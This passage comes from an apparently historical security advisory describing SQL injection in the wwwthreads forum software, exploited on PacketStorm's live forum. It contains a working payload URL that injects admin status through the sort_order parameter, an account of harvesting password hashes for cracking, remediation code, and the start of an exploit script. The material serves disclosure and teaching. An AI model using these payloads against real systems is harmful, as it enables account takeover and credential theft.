for mySQL to ignore everything else on the line; however, the 'FROM'
clause is on a separate line than the 'WHERE' clause, so mySQL won't
ignore it. Considering that invalid SQL will cause mySQL to not run any
commands, we at least need to give a valid command string to parse...in
this case, we feed a generic select (similiar to the original) back to it.
The result of this (theoretically) is to drop (delete) the general forum
table.
But in reality, it doesn't work. Not because the theory is wrong, but
because the database user we're using doesn't have DROP privileges. And
due to how wwwthreads is written, it won't quite let you do much with
this. But all is not lost, we can just start changing all numbers left and
right, looking for where it blows up...or we can go the easy route and
download the (eval) source code from www.wwwthreads.com. Yeah, kind of
cheating, but it's not quite a one-to-one solution.
You see, the eval code and the license code (of which PacketStorm is
running) are slightly different, including their SELECT statements. So we
have to be a little creative. First, let's find the SELECT statement (or
equivalent) that's featured above.
I like to use less, so I just 'less showpost.pl', and search (the '/' key)
for 'SELECT'. We come up with
# Grab the main post number for this thread
$query = qq!
SELECT Main,Last_Post
FROM $Board
WHERE Number=$Number
!;
Wow, that's it..except the field names (Main,Last_Post,Number) are
different than the pro version (B_Main,B_Last_Post,B_Number). If we look
right above it, we see
# Once and a while it people try to just put a number into the url,
if (!$Number) {
w3t::not_right("There was a problem looking up the Post...
Which is what limits the use of the $Number parameter.
At this point let's now evaluate 'why' we want to go forth into this.
Obviously DROP'ing tables ranks right up there with other stupid DoS
tricks. You may be able to modify other people's posts, but that's lame
too. Perhaps setting up our own forum? All that information is stored in
the DB. But that's a lot of records to update. How about becoming a
moderator? Or even better, an administrator? Administrators can add,
delete, and modify forums, boards, and users. That may be a worthy goal,
although your still only limited to the realm of the forum, which makes
you a king of a very small and pitiful domain.
However, there is one thing worthy. If you make yourself a user account,
you'll notice you have to enter a password. Hmmm...those passwords are
stored someplace...like, in the database. If we hedge our 'password
reuse' theory, and combined with the fact that wwwthreads (in some
configurations) post the IP address of the poster, we have some
possibilities worth checking out.
So, let's look at this password thing. Going into 'edit profile' gives us
a password field, which looks an awful lot like a crypt hash (view the
HTML source). Damn, so the passwords are hashed. Well, that just means
you'll need a password cracker and more time before you can start checking
on password reuse. Assuming we *can* get the passwords......
Let's start with the administrator access first. The adduser.pl script is
a good place to start, since it should show us all parameters of a user.
Notice the following code
# --------------------------------------
# Check to see if this is the first user
$query = qq!
SELECT Username
FROM Users
!;
$sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr.
Query: $query";
$sth -> execute() or die "Can't execute query: $query. Reason:
$DBI::errstr";
my $Status = "";
my $Security = $config{'user_security'};
my $rows = $sth -> rows;
$sth -> finish;
# -------------------------------------------------------
# If this is the first user, then status is Administrator
# otherwise they are just get normal user status.
if (!$rows){
$Status = "Administrator";
$Security = 100;
} else {
$Status = "User";
}
What this does is look to see if any users are defined. If no users are
defined, the first user added gets the Status of 'Administrator' and a
security level of 100. After that, all added users just get Status=User.
So we need to find a way to make our Status=Administrator. A full user
record can be seen a little further down...
# ------------------------------
# Put the user into the database
my $Status_q = $dbh -> quote($Status);
$Username_q = $dbh -> quote($Username);
my $Email_q = $dbh -> quote($Email);
my $Display_q = $dbh -> quote($config{'postlist'});
my $View_q = $dbh -> quote($config{'threaded'});
my $EReplies_q = $dbh -> quote("Off");
$query = qq!
INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
Display,View,PostsPer,EReplies,Security,Registered)
VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
$Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
!;
Now, I should take a moment here and explain the quote() function. A
string value of "blah blah blah", when stuck into a query that looks like
"SELECT * FROM table WHERE data=$data" will wind up looking like
SELECT * FROM table WHERE data=blah blah blah
which is not valid. The database doesn't know what to do with the extra
two blah's, since they look like commands. Therefore all string data need
to be encapsulated in single quotes ('). Therefore the query should look
like
SELECT * FROM table WHERE data='blah blah blah'
which is correct. Now, in my SQL appension article I talk about 'breaking
out' of the single quote string by including your own single quote. So if
we submitted "blah blah' MORE SQL COMMANDS...", it would look like
SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
data we submitted
This causes the SQL engine to interpret the MORE SQL COMMANDS as actual
SQL commands, since if figured the 'data' part of the string ended with
the second single quote (the one we submitted). This is a drawback of
converting data into a 'human readable' string, to be parsed back into
data again...it's hard to determine what's 'code/commands' and what's
'data'.
All is not lost, however. By submitting a '', it tells the SQL engine to
NOT end the data string, but rather only think of it as a single quote in
the data context. Therefore the following query
SELECT * FROM table WHERE data='data''more data'
makes the database look for the value "data'more data". So to keep people
from breaking out of strings and submitting extra SQL commands, all you
have to do is double up every single quote (turn ' into ''). This will
ensure that all data is indeed considered data. And this is what the
DBI->quote() function does--it will put single quotes around the string,
and double all single quotes in the string.
So after all of that explaination, the short of it is that anything that
is run through quote() is of no use to use, because we can't submit extra
SQL commands or otherwise tamper with anything fun. And if you look,
wwwthreads uses quote() extensively. So this may be rough. But all is
not lost...
You see, there are different field types. You can have strings, boolean
values, various numeric values, etc. While a string field needs to be in
the format of field='data', a numeric field doesn't use the '' (i.e.
numeric_field='2' is invalid). The correct syntax for numeric fields in
numeric_field=2. Ah ha! There's no quotes to deal with, and you can't
even use quotes anyways. The correct solution is to make sure all numeric
field data is indeed numeric (more on this later). But I'll give you a
hint...wwwthreads doesn't go that far (nor do most applications,
actually).
So, now we need a SQL statement that preferably deals with a table we are
interested in. A SELECT statement (retrieves data) is tougher, since
we'll need to include a whole 'nother query to do something other than
SELECT. INSERT and UPDATE are nice because we're already modifying
data...we can just ride in more data to update (hopefully).
Poking around brings us to a very nice spot...changeprofile.pl. This is
the script that takes data entered in editprofile.pl and enters the
changes into the database. Of course, the profile is our user profile.
This means to use this, we need a valid user account. In any event, let's
have a look-see...
# Format the query words
my $Password_q = $dbh -> quote($Password);
my $Email_q = $dbh -> quote($Email);
my $Fakeemail_q = $dbh -> quote($Fakeemail);
my $Name_q = $dbh -> quote($Name);
my $Signature_q = $dbh -> quote($Signature);
my $Homepage_q = $dbh -> quote($Homepage);
my $Occupation_q = $dbh -> quote($Occupation);
my $Hobbies_q = $dbh -> quote($Hobbies);
my $Location_q = $dbh -> quote($Location);
my $Bio_q = $dbh -> quote($Bio);
my $Username_q = $dbh -> quote($Username);
my $Display_q = $dbh -> quote($Display);
my $View_q = $dbh -> quote($View);
my $EReplies_q = $dbh -> quote($EReplies);
my $Notify_q = $dbh -> quote($Notify);
my $FontSize_q = $dbh -> quote($FontSize);
my $FontFace_q = $dbh -> quote($FontFace);
my $ICQ_q = $dbh -> quote($ICQ);
my $Post_Format_q= $dbh -> quote($Post_Format);
my $Preview_q = $dbh -> quote($Preview);
Ack! Practically everything is quoted! That means all those parameters
are useless to us. And lets peek at the final actual query that sticks
all our information back into the database
# Update the User's profile
my $query =qq!
UPDATE Users
SET Password = $Password_q,
Email = $Email_q,
Fakeemail = $Fakeemail_q,
Name = $Name_q,
Signature = $Signature_q,
Homepage = $Homepage_q,
Occupation = $Occupation_q,
Hobbies = $Hobbies_q,
Location = $Location_q,
Bio = $Bio_q,
Sort = $Sort,
Display = $Display_q,
View = $View_q,
PostsPer = $PostsPer,
EReplies = $EReplies_q,
Notify = $Notify_q,
TextCols = $TextCols,
TextRows = $TextRows,
FontSize = $FontSize_q,
FontFace = $FontFace_q,
Extra1 = $ICQ_q,
Post_Format = $Post_Format_q,
Preview = $Preview_q
WHERE Username = $Username_q
!;
Since wwwthreads nicely slaps the '_q' on the variables, it's easy to see.
See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted. Now,
let's figure out where that data comes from
my $Sort = $FORM{'sort_order'};
my $PostsPer = $FORM{'PostsPer'};
my $TextCols = $FORM{'TextCols'};
my $TextRows = $FORM{'TextRows'};
Wow, they're taken straight from the submitted form data. That means they
are not checked or validated in any way. Here's our chance!
Going back to structure of the user record (given above), there's a
'Status' field we need to change. Looking in this UPDATE query, Status
isn't listed. So this means that the Status field is going to remain
unchanged. Bummer. See what we're going to do yet? Take a second and
think about it.
Remember, all of this hinges around the fact that we want to submit what
looks like data, but in the end, the SQL engine/database will interpret it
differently. Notice in the query that the fields are listed in the format
of field=value, field=value, field=value, etc (of course, they're on
separate lines). If I were to insert some fake values (for the sake of
example), I might have
Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/'
All I did was put the fields on the same line, collapse the whitespace,
and fill in the (quoted) string values. This is valid SQL.
Now, let's put this all together. Looking at the the 'Sort' variable
(which is numeric), we would feasibly have
Bio='puppy', Sort=5, Display='threaded'
which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the
above value for Sort was given by submitting the parameter sort_order=5.
Now, let's use Sort to our advantage. What if we were to include a comma,
and then some more column values? Oh, say, the Status field? Let's set
the sort_order parameter to "5, Status='Administrator',", and then let it
run its course. Eventually we'll get a query that looks like
Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
^^^^^^^^^^^^^^^^^^^^^^^^^^
our submitted data
This is still valid SQL! And furthermore, it will cause the database to
update the Status field to be 'Administrator'! But remember when we
looked in adduser.pl, the first user had a Security level of 100. We want
that to, so we just set the sort_order parameter to "5,
Status='Administrator', Security=100,", and then we get
Bio='puppy', Sort=5, Status='Administrator', Security=100, ...
which updates both values to what we want. The database not knowing any
better will update those two fields, and now the forums will think we're
an administrator.
So I go to apply this new technique on PacketStorm...and get a 404 for
requests to changeprofile.pl. Yep, the pro version doesn't have it.
Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile',
'Display Preferences', and 'Email Notifications/Subscriptions', which the
demo does not (it's all lumped together). Wonderful. If they changed the
scripts around, they may have also changed the SQL queries (well they had
to, actually). So now we're in 'blackbox' mode (blindly making educated
guesses on what's going on). Since we want to play with the sort_order
parameter still, you'll see that it's contained in the 'Display
Preferences' script (editdisplay.pl). This script handles the sort_order,
display, view, PostPer, Post_Format, Preview, TextCols, TextRows,
FontSize, FontFace, PictureView, and PicturePost (gained by viewing the
HTML source). So it's a subset of the parameters. Using the above code
snippets, we can guess at what the SQL query looking like. So why not
give it a shot.
First I poke some invalid values into sort_order (characters instead of
numbers). This causes an error, which I figured. Since, in the first
example how the fields where 'B_' for the 'Board' table, the 'User' table
(which we are now using) prefixes colums with a 'U_'. So that means we
need to use 'U_Status' and 'U_Security' for field names. Good thing we
checked.
Since this needs to be a valid form submit, we need to submit values for
all of the listed variables. At this point I should also point out
(again) we need a valid user account of which to increase the status.
We'll need the username and password (hash), which are printed as hidden
form elements on various forms (like editdisplay.pl). You'll see the
parameters are Username and Oldpass. So based on all of this, we can
construct a URL that looks like
changedisplay.pl? Cat=&
Username=rfp
&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
&display=threaded
&view=collapsed
&PostsPer=10
&Post_Format=top
&Preview=on
&TextCols=60
&TextRows=5
&FontSize=0
&FontFace=
&PictureView=on
&PicturePost=off
The important one of course being
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
which is just an escaped version of what we used above (the %3d translate
to the '=' character). When you lump it all together into a single
string, you get
changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded
&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60
&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off
which, while gross, is what it needs to be. So, I submit this to
PacketStorm, and get
Your display preferences have been modified.
Wonderful. But, noticing on the top menu, I see an 'Admin' option now. I
click it, and what do I see but the heart warming message of
As an Administrator the following options are available to you.
Bingo! Administrator privileges! Looking at my options, I can edit
users, boards, or forums, assign moderators and administrators, ban
users/hosts, expire/close/open threads, etc.
Now for our second objective...the passwords. I go into 'Show/Edit
Users', and am asked to pick the first letter of the usernames I'm
interested in. So I pick 'R'. At list of all 'R*' users comes up. I
click on 'rfp'. And there we go, my password hash. Unfortunately,
there's no nice and easy way to dump all users and their hashes. Bummer.
So I automated a perl script to do it for me, and dump the output in a
format that can be fed into John the Ripper.
----[ 3. Solution
Now, how to defend against this? As you saw, the reason this worked was
due to non-restricted data being passed straight into SQL queries.
Luckily wwwthreads quoted (most) string data, but they didn't touch
numeric data. The solution is to make sure numeric data is indeed
numeric. You can do it the 'silent' way by using a function like so
sub onlynumbers {
($data=shift)=~tr/0-9//cd;
return $data;}
And similar to how all string data is passed through DBI->quote(), pass
all numeric data through onlynumbers(). So, for the above example, it
would be better to use
my $Sort = onlynumbers($FORM{'sort_order'});
Another area that needs to be verified is the table name. In our very
first example, we had 'Board=general'. As you see here, a table name is
not quoted like a string. Therefore we also need to run all table names
through a function to clean them up as well. Assuming table names can
have letters, numbers, and periods, we can scrub it with
sub scrubtable {
($data=shift)=~tr/a-zA-Z0-9.//cd;
return $data;}
which will remove all other cruft.
In the end, *all* (let me repeat that... **ALL**) incoming user data
should be passed through quote(), onlynumbers(), or scrubtable()...NO
EXCEPTIONS! Passing user data straight into a SQL query is asking for
someone to tamper with your database.
New versions of wwwthreads are available from www.wwwthreads.com, which
implement the solutions pretty much as I've described them here.
----[ 4. Conclusion
I've included two scripts below. wwwthreads.pl will run the query for you
against a pro version of wwwthreads. You just have to give the ip
address of the server running wwwthreads, and a valid user and password
hash. w3tpass.pl will walk and download all wwwthreads user password
hashes, and give output suitable for password cracking with John the
Ripper.
Thanks to PacketStorm for being a good sport about this.
- Rain Forest Puppy / rfp@wiretrip.net
- I feel a rant coming on...
----[ 5. Included perl scripts
-[ wwwthreads.pl
#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;
#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '